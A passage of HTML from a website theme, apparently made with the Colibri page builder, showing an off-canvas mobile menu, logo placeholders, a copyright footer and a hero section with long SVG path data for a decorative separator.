0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path 